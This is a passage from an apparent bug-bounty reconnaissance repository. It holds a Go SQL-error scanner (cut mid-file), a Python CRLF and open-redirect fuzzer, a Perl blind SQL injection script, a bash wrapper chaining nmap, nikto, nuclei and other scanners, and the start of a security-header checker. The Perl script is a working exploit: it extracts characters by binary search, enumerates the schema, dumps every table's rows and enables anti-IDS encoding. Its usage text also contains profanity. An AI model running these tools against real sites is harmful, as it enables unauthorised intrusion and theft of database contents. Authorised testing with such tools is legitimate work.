-> %s\n", err) 259 | } 260 | 261 | res.Header.Add("Content-Type", "application/x-www-form-urlencoded") 262 | resp, err := client.Do(res) 263 | if err != nil { 264 | log.Fatalf("\033[31m[X] Unable to process response: %s\n", err) 265 | } 266 | 267 | body, err = ioutil.ReadAll(resp.Body) 268 | if err != nil { 269 | log.Fatalf("\033[31m[X] Unable to read response body: %s\n", err) 270 | } 271 | 272 | resp.Body.Close() // close response 273 | 274 | for idx, re := range errRegexes { 275 | if re.MatchString(string(body)) { 276 | stringerror := "Server is vulnerable" 277 | errormsg := "An error | detected vulnerability" 278 | // fmt.Printf("[+] SQL Error found [Server->%s] for payload: %s\n", errors[idx], payload) 279 | row_1 := []interface{}{errors[idx], payload} 280 | row_2 := []interface{}{errormsg} 281 | t := gotabulate.Create([][]interface{}{row_1, row_2}) 282 | t.SetHeaders([]string{*flagTarget, stringerror}) 283 | t.SetAlign("center") 284 | fmt.Println("\033[37m", t.Render("grid")) 285 | break 286 | } 287 | } 288 | } 289 | } 290 | -------------------------------------------------------------------------------- /tools/Injectus.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3.7 2 | 3 | import argparse 4 | import asyncio 5 | import logging 6 | import re 7 | import sys 8 | import signal 9 | import time 10 | 11 | from multiprocessing import Pool, Process, JoinableQueue 12 | from urllib.parse import urlsplit, urlunsplit, unquote 13 | from pathlib import Path 14 | 15 | from utils import build_crlf_list, build_openredirect_list 16 | 17 | import aiohttp 18 | import aiofiles 19 | 20 | class bcolors: 21 | HEADER = "\033[95m" 22 | OKBLUE = "\033[94m" 23 | OKGREEN = "\033[92m" 24 | RED = "\033[31m" 25 | WARNING = "\033[93m" 26 | FAIL = "\033[91m" 27 | ENDC = "\033[0m" 28 | BOLD = "\033[1m" 29 | UNDERLINE = "\033[4m" 30 | 31 | banner = f''' 32 | {bcolors.OKGREEN} 33 | ▪ ▐ ▄ ▐▄▄▄▄▄▄ . ▄▄· ▄▄▄▄▄▄• ▄▌.▄▄ · 34 | ██ •█▌▐█ ·██▀▄.▀·▐█ ▌▪•██ █▪██▌▐█ ▀. 35 | ▐█·▐█▐▐▌▪▄ ██▐▀▀▪▄██ ▄▄ ▐█.▪█▌▐█▌▄▀▀▀█▄ 36 | ▐█▌██▐█▌▐▌▐█▌▐█▄▄▌▐███▌ ▐█▌·▐█▄█▌▐█▄▪▐█ 37 | ▀▀▀▀▀ █▪ ▀▀▀• ▀▀▀ ·▀▀▀ ▀▀▀ ▀▀▀ ▀▀▀▀ {bcolors.ENDC} 38 | {bcolors.UNDERLINE}{bcolors.FAIL}~ BOUNTYSTRIKE ~{bcolors.ENDC} 39 | ''' 40 | 41 | 42 | class SigHandler: 43 | def __init__(self, async_queue): 44 | self.queue = async_queue 45 | def __call__(self, signo, frame): 46 | print("\n[-] CTRL-C Detected, attempting graceful shutdown...") 47 | print("[-] Notifying workers to shutdown...") 48 | 49 | self.queue._queue.clear() 50 | self.queue._finished.set() 51 | self.queue._unfinished_tasks = 0 52 | 53 | async def worker(name: str, queue, session, delay): 54 | while True: 55 | try: 56 | url_dict = await queue.get() 57 | except asyncio.QueueEmpty: 58 | break 59 | 60 | if url_dict is None: 61 | break 62 | 63 | u = url_dict 64 | 65 | try: 66 | async with session.get(u.get("url"), allow_redirects=False) as resp: 67 | 68 | if u.get("type") == "crlf": 69 | if "bounty" in resp.headers.keys(): 70 | print(f"{bcolors.OKGREEN}[{name}] CRLF Injection detected: {u.get('url')}{bcolors.ENDC}") 71 | else: 72 | print(f'[{name}] injecting crlf payloads {u.get("url")} {bcolors.FAIL}[FAILED]{bcolors.ENDC}') 73 | 74 | if u.get("type") == "openredirect": 75 | # This comparison is un ugly hack because aiohttp only support scheme to be 76 | # either https|http|''. Need to set redirect=False because of this. 77 | if "Location" in resp.headers.keys() and resp.headers["Location"].startswith(unquote(u["payload"])): 78 | print(f"{bcolors.OKGREEN}[{name}] Open redirect detected: {u.get('url')}{bcolors.ENDC}") 79 | else: 80 | print(f'[{name}] injecting open redirect payloads {u.get("url")} {bcolors.FAIL}[FAILED]{bcolors.ENDC}') 81 | 82 | await asyncio.sleep(delay) 83 | 84 | except asyncio.TimeoutError: 85 | print(f"{bcolors.WARNING}[ERROR][{name}] timed out when attacking {u.get('url')}...{bcolors.ENDC}") 86 | queue.task_done() 87 | continue 88 | except Exception as e: 89 | print(f"[ERROR] Something went wrong: {e}") 90 | queue.task_done() 91 | break 92 | 93 | queue.task_done() 94 | 95 | 96 | async def start(args): 97 | started_at = time.time() 98 | filename = args.file 99 | workers = args.workers 100 | url = args.url 101 | async_queue = asyncio.Queue() 102 | delay = args.delay 103 | 104 | signal.signal(signal.SIGINT, SigHandler(async_queue)) 105 | 106 | if url: 107 | if args.crlf: 108 | for payload in build_crlf_list(url): 109 | if args.no_request: 110 | print(payload) 111 | else: 112 | await async_queue.put(payload) 113 | 114 | if args.openredirect: 115 | for payload in build_openredirect_list(url): 116 | if args.no_request: 117 | print(payload) 118 | else: 119 | await async_queue.put(payload) 120 | else: 121 | async with aiofiles.open(f"{filename}", "r") as f: 122 | async for domain in f: 123 | domain = domain.replace("\n", "") 124 | 125 | if args.crlf: 126 | for inject in build_crlf_list(domain): 127 | if args.no_request: 128 | print(f"[{inject['type']}] {inject['url']}") 129 | else: 130 | await async_queue.put(inject) 131 | 132 | if args.openredirect: 133 | for inject in build_openredirect_list(domain): 134 | if args.no_request: 135 | print(f"[{inject['type']}] {inject['url']}") 136 | else: 137 | await async_queue.put(inject) 138 | 139 | if not args.no_request: 140 | # Create workers 141 | tasks = [] 142 | size = async_queue.qsize() 143 | connector = aiohttp.TCPConnector( 144 | ssl=False, 145 | limit=50, 146 | ) 147 | session = aiohttp.ClientSession(connector=connector,timeout=aiohttp.ClientTimeout(total=args.timeout)) 148 | for i in range(workers): 149 | task = asyncio.create_task(worker(f'worker-{i}', async_queue, session, delay)) 150 | tasks.append(task) 151 | 152 | # Wait until the queue is fully processed. 153 | await async_queue.join() 154 | 155 | # Cancel our worker tasks. 156 | for task in tasks: 157 | task.cancel() 158 | await session.close() 159 | # Wait until all worker tasks are cancelled. 160 | await asyncio.gather(*tasks, return_exceptions=True) 161 | time_ended = time.time() - started_at 162 | 163 | print('=====================================') 164 | print(f"[+] Processing time: {time_ended} seconds") 165 | print(f"[+] Total URLs {size}") 166 | 167 | 168 | def main(): 169 | parser = argparse.ArgumentParser(prog="Injectus", description="CRLF and open redirect fuzzer. Crafted by @dubs3c.") 170 | parser.add_argument("-f", "--file", action="store", dest="file", help="File containing URLs") 171 | parser.add_argument("-u", "--url", action="store", dest="url", help="Single URL to test") 172 | parser.add_argument("-r", "--no-request", action="store_true", dest="no_request", help="Only build attack list, do not perform any requests") 173 | parser.add_argument("-w", "--workers", type=int, default=10, dest="workers", action="store", help="Amount of asyncio workers, default is 10") 174 | parser.add_argument("-t", "--timeout", type=int, default=6, dest="timeout", action="store", help="HTTP request timeout, default is 6 seconds") 175 | parser.add_argument("-d", "--delay", type=int, default=1, dest="delay", action="store", help="The delay between requests, default is 1 second") 176 | parser.add_argument("-c", "--crlf", action="store_true", dest="crlf", help="Only perform crlf attacks") 177 | parser.add_argument("-op", "--openredirect", action="store_true", dest="openredirect", help="Only perform open redirect attacks") 178 | args = parser.parse_args() 179 | 180 | if len(sys.argv) == 1: 181 | print(banner) 182 | parser.print_help() 183 | quit() 184 | 185 | if not args.url and not Path.exists(Path(args.file).resolve()): 186 | print(f"{args.file} does not exist") 187 | quit() 188 | 189 | if args.url and args.file: 190 | print("Can't specify both -u and -f, choose one!") 191 | quit() 192 | 193 | if args.crlf and not args.openredirect: 194 | args.openredirect = False 195 | 196 | if args.openredirect and not args.crlf: 197 | args.crlf = False 198 | 199 | if not args.openredirect and not args.crlf: 200 | args.crlf = True 201 | args.openredirect = True 202 | 203 | 204 | asyncio.run(start(args)) 205 | 206 | if __name__ == "__main__": 207 | main() -------------------------------------------------------------------------------- /tools/sqli.pl: -------------------------------------------------------------------------------- 1 | use strict; 2 | use Getopt::Std; 3 | use Digest::MD5 qw(md5_hex); 4 | use LW2; 5 | 6 | my %options = (); 7 | getopts("u:h:q:", \%options); 8 | 9 | my $url = $options{u}; # Vuln URL 10 | my $host = $options{h}; # Needs this for libwhisker 11 | 12 | 13 | # Format. 14 | my $count = 0; 15 | 16 | 17 | if ( $url eq "" ) { 18 | print "\n[!] need a url or hostname preferably both [!]\n"; 19 | print "\n[+] Try maybe- IDK fucking perl sqli.pl -u -h fucking cunt LOL "; 20 | print "\n[+] perl sqli.pl -u http://testphp.vulnweb.com/ -h 18.192.172.30"; 21 | print "\n[!] Aboring......\n"; 22 | exit(1); 23 | } 24 | 25 | if (my $q = $options{q}) { 26 | $q =~ s/\ /%20/g; 27 | my ($cxr, $result) = runQuery($url,$host,$q); 28 | print "Query Result:\n\t$result\nCalculated in $cxr requests.\n"; 29 | exit(1); 30 | } 31 | 32 | # Get the Database Version 33 | my $query = "SELECT%20VERSION()"; 34 | my ($tmp, $version) = runQuery($url, $host, $query); 35 | $count += $tmp; 36 | $count += 2; 37 | print "\nDatabase Version:\t\t$version\nIn $count requests.\n\n"; 38 | 39 | # Get the Database Name 40 | $query = "SELECT%20DATABASE()"; 41 | my ($tmp,$answer) = runQuery($url, $host, $query); 42 | print "Database Name:\t\t$answer\nIn $tmp requests.\n\n"; 43 | 44 | # Get the Database Username 45 | $query = "SELECT%20USER()"; 46 | my ($tmp,$answer) = runQuery($url, $host, $query); 47 | print "Database User:\t\t$answer\nIn $tmp requests.\n\n"; 48 | 49 | 50 | if ($version =~ /5\./g) 51 | { 52 | print "Enumerating Database Spec:\n"; 53 | getSchema($url,$host); 54 | exit(1); 55 | } else { 56 | print "This is not MySQL v5.x, so I can't enumerate the schema tables!\n"; 57 | exit(1); 58 | } 59 | 60 | sub getSchema 61 | { 62 | my $url = shift; 63 | my $host = shift; 64 | my $query = "SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=(SELECT DATABASE())"; 65 | $query =~ s/ /%20/g; 66 | 67 | my ($c, $val) = runQuery($url,$host,$query); 68 | for (my $i=0; $i < int($val); ++$i) 69 | { 70 | $query = "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=(SELECT DATABASE()) LIMIT $i,1"; 71 | $query =~ s/ /%20/g; 72 | 73 | my ($q, $table) = runQuery($url,$host,$query); 74 | print "$table:\n";#table name 75 | $query = "SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="; 76 | $query .= "(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA="; 77 | $query .= "(SELECT DATABASE()) LIMIT $i,1)"; 78 | $query =~ s/ /%20/g; 79 | 80 | my ($r, $fcount) = runQuery($url,$host,$query); 81 | # $fcount - number of columns in the table 82 | for (my $n = 0; $n < int($fcount); ++$n) 83 | { 84 | $query = "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="; 85 | $query .= "(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA="; 86 | $query .= "(SELECT DATABASE()) LIMIT $i,1) LIMIT $n,1"; 87 | $query =~ s/ /%20/g; 88 | my ($o, $field) = runQuery($url,$host,$query); 89 | print "\t$field\n"; 90 | # scrape main database. 91 | $query = "SELECT COUNT($field) FROM $table"; 92 | $query =~ s/ /%20/g; 93 | my ($r, $total) = runQuery($url,$host,$query); 94 | for (my $cn = 0; $cn < $total; $cn++) 95 | { 96 | $query = "SELECT $field FROM $table LIMIT $cn,1"; 97 | $query =~ s/ /%20/g; 98 | my ($e, $data) = runQuery($url,$host,$query); 99 | print "\t\t$data\n"; 100 | } 101 | } 102 | } 103 | } 104 | 105 | sub runQuery 106 | { 107 | my $url = shift; 108 | my $host = shift; 109 | my $query = shift; 110 | 111 | my $qCount; 112 | my $qCH; 113 | 114 | my $pos = 1; 115 | my $floor = 0; # Bottom of ascii keyrange 116 | my $ceiling = 255; # Top of ascii keyrange 117 | 118 | my $spacer = "%20OR%20"; 119 | my $truth = "62=62/*"; 120 | my $lie = "88=98/*"; 121 | 122 | my ($true, $false) = makeTrueFalse($url, $spacer, $truth, $lie, $host); 123 | my $lenUri = "$url" . queryConstruct(0, 0, $spacer, $query); 124 | my ($qCH, $len) = getValue($lenUri, 64, 0, $true, $false, $host); 125 | $qCount += $qCH; 126 | my $results = ""; 127 | while (($pos < $len) || ($pos eq $len)) 128 | { 129 | my $uri = "$url" . queryConstruct(1, $pos, $spacer, $query); #construct the actual URI 130 | my ($qCH, $value) = getValue($uri, $ceiling, $floor, $true, $false, $host); 131 | $qCount += $qCH; 132 | my $char = chr("$value"); 133 | $results .= $char; 134 | ++$pos; 135 | } 136 | return ($qCount, $results); 137 | } 138 | 139 | #Logrithm 140 | sub getValue 141 | { 142 | my $uri = shift; 143 | my $ceiling = shift; 144 | my $floor = shift; 145 | my $true = shift; 146 | my $false = shift; 147 | my $host = shift; 148 | 149 | my $nextmaybe; 150 | my $target; 151 | my $qCount = 0; 152 | 153 | my $maybe = int($ceiling/2); 154 | 155 | while (not defined $target) { 156 | if (isGT($uri, $maybe, $host) eq $true) 157 | { 158 | ++$qCount; 159 | $floor = $maybe; 160 | $nextmaybe = int($maybe + (($ceiling - $floor)/2)); 161 | } elsif (isLT($uri, $maybe, $host) eq $true) 162 | { 163 | ++$qCount; 164 | $ceiling = $maybe; 165 | $nextmaybe = int($maybe - (($ceiling - $floor)/2)); 166 | } elsif (isEQ($uri, $maybe, $host) eq $true) 167 | { 168 | ++$qCount; 169 | $target = $maybe; 170 | return ($qCount, $target); 171 | } 172 | $maybe = $nextmaybe; 173 | if (($maybe eq "") || (!$maybe) || (not defined $maybe)) 174 | { 175 | print "[-] SQL Error caught! Aborting!\n"; 176 | print "[-] At least 3 queries in error log!\n"; 177 | print "[-] SQL SERVER MAYBE TO HIGH OR TOO LOW LEVEL\n"; 178 | exit(1); 179 | } 180 | } 181 | } 182 | 183 | # Is greater than? 184 | sub isGT 185 | { 186 | my $uri = shift; 187 | my $guess = shift; 188 | my $host = shift; 189 | return (md5_hex(download("$uri>$guess)/*", $host))); 190 | } 191 | 192 | # Is less than? 193 | sub isLT 194 | { 195 | my $uri = shift; 196 | my $guess = shift; 197 | my $host = shift; 198 | return (md5_hex(download("$uri<$guess)/*", $host))); 199 | } 200 | 201 | sub isEQ 202 | { 203 | my $uri = shift; 204 | my $guess = shift; 205 | my $host = shift; 206 | return (md5_hex(download("$uri=$guess)/*", $host))); 207 | } 208 | 209 | # Ripped off from an older version of the scanner 210 | sub download 211 | { 212 | my $uri = shift; 213 | my $try = 5; 214 | my $host = shift; 215 | my %request; 216 | my %response; 217 | LW2::http_init_request(\%request); 218 | $request{'whisker'}->{'method'} = "GET"; 219 | $request{'whisker'}->{'host'} = $host; 220 | $request{'whisker'}->{'uri'} = $uri; 221 | $request{'whisker'}->{'encode_anti_ids'} = 962; 222 | $request{'whisker'}->{'user-agent'} = "wget"; 223 | LW2::http_fixup_request(\%request); 224 | if(LW2::http_do_request(\%request, \%response)) { 225 | if($try < 5) { 226 | print "Failed to fetch $uri on try $try. Retrying...\n"; 227 | return undef if(!download($uri, $try++)); 228 | } 229 | print "Failed to fetch $uri.\n"; 230 | return undef; 231 | } else { 232 | return ($response{'whisker'}->{'data'}, $response{'whisker'}->{'data'}); 233 | } 234 | } 235 | 236 | sub queryConstruct 237 | { 238 | my $type = shift; 239 | my $pos = shift; 240 | my $spacer = shift; 241 | my $query = shift; 242 | 243 | if ($type eq 0) # Len 244 | { 245 | my $newQuery = "LENGTH(($query))"; 246 | my $padding = "("; 247 | my $ender = ""; 248 | return ("$spacer$padding$newQuery$ender"); 249 | } elsif ($type eq 1) # String 250 | { 251 | my $padding = "((ASCII((LOWER((MID(("; #query construction 252 | my $ender = "),$pos,1))))))"; # End query Construct 253 | return ("$spacer$padding$query$ender"); #construct the actual query 254 | } 255 | } 256 | 257 | sub makeTrueFalse 258 | { 259 | my $url = shift; 260 | my $spacer = shift; 261 | my $truth = shift; 262 | my $lie = shift; 263 | my $host = shift; 264 | my $trueMD = md5_hex(download("$url$spacer$truth", $host)); 265 | my $falsMD = md5_hex(download("$url$spacer$lie", $host)); 266 | 267 | # returns true, false 268 | return ($trueMD, $falsMD); 269 | } 270 | 271 | -------------------------------------------------------------------------------- /parrot-recon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # WARNING! This tool is incredibly invasive and will make a lot of noise on a network it 4 | # is designed for bug bounties not pentests involving a blue team. please be careful when 5 | # using this tool. Also DISCLAIMER: I WILL NOT BE HELD RESPONSIBLE FOR ANY ILLEGAL ACTIVITY 6 | # YOU DECIDE TO DO WITH THIS TOOL. IT WAS MADE FOR ETHICAL PURPOSES. PLEASE BE CARFUL!!! 7 | 8 | # banner 9 | cat << "EOF" 10 | ___ __ ___ 11 | / _ \___ ____________ / /____ / _ \___ _______ ___ 12 | / ___/ _ `/ __/ __/ _ \/ __(_-< / , _/ -_) __/ _ \/ _ \ 13 | /_/ \_,_/_/ /_/ \___/\__/___/ /_/|_|\__/\__/\___/_//_/ 14 | 15 | /.\ 16 | | \ 17 | / \ 18 | // / 19 | |/ /\__________________________________________________ 20 | / / 21 | / / 22 | \/ 23 | EOF 24 | 25 | # defines enviornment variables and terminal colors 26 | red=`tput setaf 1` 27 | white=`tput setaf 7` 28 | green=`tput setaf 2` 29 | blue=`tput setaf 4` 30 | working_dir=$(cd -P -- "$(dirname -- "$0")" && pwd -P) 31 | results_dir=$working_dir/results 32 | tools_dir=$working_dir/tools 33 | format_newline='printf \n' 34 | 35 | 36 | # argument parsing to decide what scan should be ran 37 | format_newline() { 38 | printf "\n" 39 | } 40 | 41 | # Usage function 42 | usage() { 43 | format_newline 44 | echo "${green}Usage:${white} $0 -d -t -w -c " 45 | format_newline 46 | echo "Scan Types:" 47 | echo "${red}API${white} - Enumerates an API and finds common misconfigurations" 48 | echo "${red}WEB${white} - Enumerates a Web Application and runs a vulnerability scan" 49 | echo "${red}ALL${white} - Performs both API and Web enumeration" 50 | exit 0 51 | } 52 | 53 | api_scan(){ 54 | echo "[!] Starting API Scanning" 55 | 56 | echo "[+] Extracting API URLs from Collection File: $api_collection" 57 | 58 | case "$api_collection" in 59 | *.json) 60 | echo "[*] JSON file detected. Extracting URLs using grep on $api_collection" 61 | cat "$api_collection" | grep -oP '"raw":\s*"\Khttps?://[^"]+' > api_urls.txt 62 | ;; 63 | *.yaml|*.yml) 64 | echo "[*] YAML file detected. Extracting URLs using grep on $api_collection" 65 | cat $api_collection | grep 'url' | cut -d ':' -f3 | tr -d ' ' | tr -d '"' | cut -d '/' -f3 | sed 's/^/https:\/\//' > api_urls.txt 66 | ;; 67 | *) 68 | echo "[!] Error: Unsupported file format. Please provide a .json or .yaml/.yml file." 69 | ;; 70 | esac 71 | 72 | 73 | echo "$blue[+] URLs extracted and saved to api_urls.txt$white" 74 | 75 | url=$(cat api_urls.txt) 76 | 77 | # url without https:// 78 | url_no_https=$(echo $url | sed 's/https:\/\///') 79 | 80 | echo "$red[+] Starting Nmap Script Vuln Enumeration on Endpoint$white" 81 | nmap -sV -sC -p 443 --script=vuln -oA $results_dir/nmap-api-vuln-scan $url_no_https 82 | echo "$green[+] Nmap Script Vuln Enumeration Saved To: $results_dir/nmap-api-vuln-scan" 83 | 84 | echo "$red[+] Starting Nitko Scan for API$white" 85 | nikto -h $url -o $results_dir/nikto-api-scan.txt 86 | echo "$green[+] Nikto Scan Saved To: $results_dir/nikto-api-scan.txt" 87 | 88 | echo "$red[+] Checking for Authentication Bypass$white" 89 | # Get the HTTP response code using cURL 90 | response=$(curl -s -o /dev/null -w "%{http_code}" "$url") 91 | # Output the URL and response code 92 | echo "----------------- Results -------------------" 93 | echo "$url - $response" 94 | # Check if the response code is 200 95 | if [ "$response" -eq 200 ]; then 96 | echo "$red[-] Authentication bypass may be possible $white" 97 | else 98 | echo "$green[+] Authentication bypass may not not possible $white" 99 | fi 100 | 101 | exit 0 102 | } 103 | 104 | 105 | scan_all(){ 106 | api_scan 107 | web_scan 108 | } 109 | 110 | web_scan(){ 111 | # enumerating websites domain using the tools from install script 112 | echo "$blue[+] Starting Website Enumeration" 113 | go run $tools_dir/main.go -t http://$domain || go run $tools_dir/main.go -t https://$domain 114 | echo "$red[+] Starting URL DORK Scan$white" 115 | bash $tools_dir/dork.sh $domain > $results_dir/$domain-dork.txt 116 | echo "$green[+] URL DORK Scan Saved To: $results_dir/$domain-dork.txt" 117 | 118 | echo "$red[+] Starting Nmap TCP Scan$white" 119 | nmap -sV -sC $domain -oA $results_dir/$domain-tcp-scan --open 120 | echo "$green[+] Nmap TCP Scan Saved To: $results_dir/$domain-tcp-scan" 121 | 122 | # echo "$red[+] Starting Nmap UDP Scan$white" 123 | # nmap -sV -sU $domain -oA $results_dir/$domain-udp-scan --open 124 | # echo "$green[+] Nmap UDP Scan Saved To: $results_dir/$domain-udp-scan" 125 | 126 | echo "$red[+] Starting IDS/IPS Detection $white" 127 | wafw00f https://$domain -o $results_dir/wafw00f-$domain.txt || wafw00f http://$domain -o $results_dir/wafw00f-$domain.txt 128 | echo "$green[+] IPS/IPS Results Saved To: $results_dir/wafw00f-$domain.txt" 129 | 130 | echo "$red[+] Starting Subdomain Enumeration$white" 131 | sublist3r -d $domain -o $results_dir/subdomains-$domain.txt 132 | echo "$green[+] Subdomains Saved To: $results_dir/subdomains-$domain.txt" 133 | 134 | echo "$red[+] Starting Nikto Scan$white" 135 | nikto -h $domain -o $results_dir/nikto-$domain.txt 136 | echo "$green[+] Nikto Scan Saved To: $results_dir/nikto-$domain.txt" 137 | 138 | echo "$red[+] Starting CMS Enumeration$white" 139 | cmsmap -F https://$domain -o $results_dir/cmsenum-$domain.txt || cmsmap -F http://$domain -o $results_dir/cmsenum-$domain.txt 140 | echo "$green[+] CMS Enumeration Saved To: $results_dir/cmsenum-$domain.txt" 141 | 142 | echo "$red[+] Starting SSL Scans$white" 143 | sslyze --regular $domain > $results_dir/$domain-sslyze-regular.txt 144 | echo "$green[+] Regular SSL Scan Saved To: $results_dir/$domain-sslyze-regular.txt" 145 | sslyze --heartbleed $domain > $results_dir/$domain-sslyze-heartbleed.txt 146 | echo "$green[+] HeartBleed Scan Saved To: $results_dir/$domain-sslyze-heartbleed.txt" 147 | sslyze --robot $domain > $results_dir/$domain-sslyze-robot.txt 148 | echo "$green[+] Robot Scan Saved To: $results_dir/$domain-sslyze-robot.txt" 149 | 150 | echo "$red[+] Starting Nuclei Scans$white" 151 | nuclei -u $domain -o $results_dir/nuclei-$domain.txt 152 | echo "$green[+] Neclei Scans Saved To: $results_dir/nuclei-$domain.txt" 153 | 154 | 155 | echo "$red[+] Starting Secure Headers Check$white" 156 | python3 $tools_dir/shcheck.py https://$domain > $results_dir/$domain-shcheck.txt || python3 $tools_dir/shcheck.py http://$domain > $results_dir/$domain-shcheck.txt 157 | echo "$green[+] Shcheck Results Saved To: $results_dir/$domain-shcheck.txt" 158 | 159 | echo "$red[+] Starting CORS Enumeration$white" 160 | python3 $tools_dir/cors_scanner.py -u https://$domain -csv $results_dir/$domain-cors.csv || python3 $tools_dir/cors_scanner.py -u http://$domain -csv $results_dir/$domain-cors.csv 161 | echo "$green[+] CORS Enumaration Results Saved To: $results_dir/$domain-cors.csv" 162 | 163 | echo "$red[+] Starting HTTP HEADER INJECTION Enumeration$white" 164 | $tools_dir/headi -u https://$domain/ > $results_dir/headi-$domain.txt || headi -u http://$domain/ > $results_dir/headi-$domain.txt 165 | echo "$green[+] HTTP HEADER INJECTION Results Saved To: $results_dir/headi-$domain.txt" 166 | } 167 | 168 | 169 | # Parse command-line options 170 | while getopts ":d:t:w:h:c:" opt; do 171 | case ${opt} in 172 | d ) 173 | domain=${OPTARG} 174 | ;; 175 | t ) 176 | type=${OPTARG} 177 | ;; 178 | w ) 179 | wordlist=${OPTARG} 180 | ;; 181 | h ) 182 | usage 183 | ;; 184 | c ) 185 | api_collection=${OPTARG} 186 | ;; 187 | \? ) 188 | echo "${red}Invalid option: -${OPTARG}${reset}" >&2 189 | usage 190 | ;; 191 | : ) 192 | echo "${red}Option -${OPTARG} requires an argument.${reset}" >&2 193 | usage 194 | ;; 195 | esac 196 | done 197 | 198 | # Validate required arguments 199 | if [ -z "$domain" ] || [ -z "$type" ]; then 200 | echo "${red}Domain and type are required.${reset}" 201 | usage 202 | fi 203 | 204 | # Check for root privileges 205 | if [ "$(id -u)" -ne 0 ]; then 206 | echo "${red}[!] This script must be run as root.${reset}" 207 | exit 1 208 | fi 209 | 210 | # Environment setup 211 | format_newline 212 | echo "[+] Setting Up Environment" 213 | mkdir -p "$results_dir" 214 | 215 | # Output domain information 216 | format_newline 217 | echo "[*] Domain Name: $domain" 218 | ip_address=$(host $domain | awk '/has address/ { print $4 ; exit }') 219 | echo "[*] IP Address: $ip_address" 220 | 221 | # Scan configuration 222 | scan_config() { 223 | case $type in 224 | "API" ) 225 | echo "${green}[+] Running an API scan on $domain${reset}" 226 | api_scan 227 | ;; 228 | "WEB" ) 229 | echo "${green}[+] Running a WEB scan on $domain${reset}" 230 | web_scan 231 | ;; 232 | "ALL" ) 233 | echo "${green}[+] Running both API and WEB scans on $domain${reset}" 234 | ;; 235 | * ) 236 | echo "${red}Unknown scan type: $type${reset}" 237 | usage 238 | ;; 239 | esac 240 | } 241 | 242 | scan_config 243 | 244 | 245 | #echo "$red[+] Sending Completion Email " 246 | #python3 mailserver/sendemail.py 247 | 248 | #echo "$red[+] Opening Web Server" 249 | #python3 webdav/webserver.py 250 | 251 | echo "$red[+] Script Done!$white" 252 | echo "$red[+] Check Your WebDAV For The Results!$white" 253 | -------------------------------------------------------------------------------- /tools/shcheck.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # shcheck - Security headers check! 4 | # Copyright (C) 2019-2021 santoru 5 | # 6 | # This program is free software: you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License as published by 8 | # the Free Software Foundation, either version 3 of the License, or 9 | # (at your option) any later version. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program. If not, see . 18 | 19 | 20 | import urllib.request 21 | import urllib.error 22 | import urllib.parse 23 | import http.client 24 | import socket 25 | import sys 26 | import ssl 27 | import os 28 | import json 29 | from optparse import OptionParser 30 | 31 | 32 | class darkcolours: 33 | HEADER = '\033[95m' 34 | OKBLUE = '\033[94m' 35 | OKGREEN = '\033[92m' 36 | WARNING = '\033[93m' 37 | FAIL = '\033[91m' 38 | ENDC = '\033[0m' 39 | BOLD = '\033[1m' 40 | UNDERLINE = '\033[4m' 41 | 42 | 43 | class lightcolours: 44 | HEADER = '\033[95m' 45 | OKBLUE = '\033[94m' 46 | OKGREEN = '\033[92m' 47 | WARNING = '\033[95m' 48 | FAIL = '\033[91m' 49 | ENDC = '\033[0m' 50 | BOLD = '\033[1m' 51 | UNDERLINE = '\033[4m' 52 | 53 | 54 | # log - prints unless JSON output is set 55 | def log(string): 56 | if options.json_output: 57 | return 58 | print(string) 59 | 60 | 61 | # Client headers to send to the server during the request. 62 | client_headers = { 63 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0)\ 64 | Gecko/20100101 Firefox/53.0', 65 | 'Accept': 'text/html,application/xhtml+xml,\ 66 | application/xml;q=0.9,*/*;q=0.8', 67 | 'Accept-Language': 'en-US;q=0.8,en;q=0.3', 68 | 'Upgrade-Insecure-Requests': 1 69 | } 70 | 71 | 72 | # Security headers that should be enabled 73 | sec_headers = { 74 | 'X-XSS-Protection': 'deprecated', 75 | 'X-Frame-Options': 'warning', 76 | 'X-Content-Type-Options': 'warning', 77 | 'Strict-Transport-Security': 'error', 78 | 'Content-Security-Policy': 'warning', 79 | 'X-Permitted-Cross-Domain-Policies': 'deprecated', 80 | 'Referrer-Policy': 'warning', 81 | 'Expect-CT': 'deprecated', 82 | 'Permissions-Policy': 'warning', 83 | 'Cross-Origin-Embedder-Policy': 'warning', 84 | 'Cross-Origin-Resource-Policy': 'warning', 85 | 'Cross-Origin-Opener-Policy': 'warning' 86 | } 87 | 88 | information_headers = { 89 | 'X-Powered-By', 90 | 'Server', 91 | 'X-AspNet-Version', 92 | 'X-AspNetMvc-Version' 93 | } 94 | 95 | cache_headers = { 96 | 'Cache-Control', 97 | 'Pragma', 98 | 'Last-Modified' 99 | 'Expires', 100 | 'ETag' 101 | } 102 | 103 | headers = {} 104 | 105 | 106 | def banner(): 107 | log("") 108 | log("======================================================") 109 | log(" > shcheck.py - santoru ..............................") 110 | log("------------------------------------------------------") 111 | log(" Simple tool to check security headers on a webserver ") 112 | log("======================================================") 113 | log("") 114 | 115 | 116 | def colorize(string, alert): 117 | bcolors = darkcolours 118 | if options.colours == "light": 119 | bcolors = lightcolours 120 | elif options.colours == "none": 121 | return string 122 | color = { 123 | 'error': bcolors.FAIL + string + bcolors.ENDC, 124 | 'warning': bcolors.WARNING + string + bcolors.ENDC, 125 | 'ok': bcolors.OKGREEN + string + bcolors.ENDC, 126 | 'info': bcolors.OKBLUE + string + bcolors.ENDC, 127 | 'deprecated': string # No color for deprecated headers or not-an-issue ones 128 | } 129 | return color[alert] if alert in color else string 130 | 131 | 132 | def parse_headers(hdrs): 133 | global headers 134 | headers = 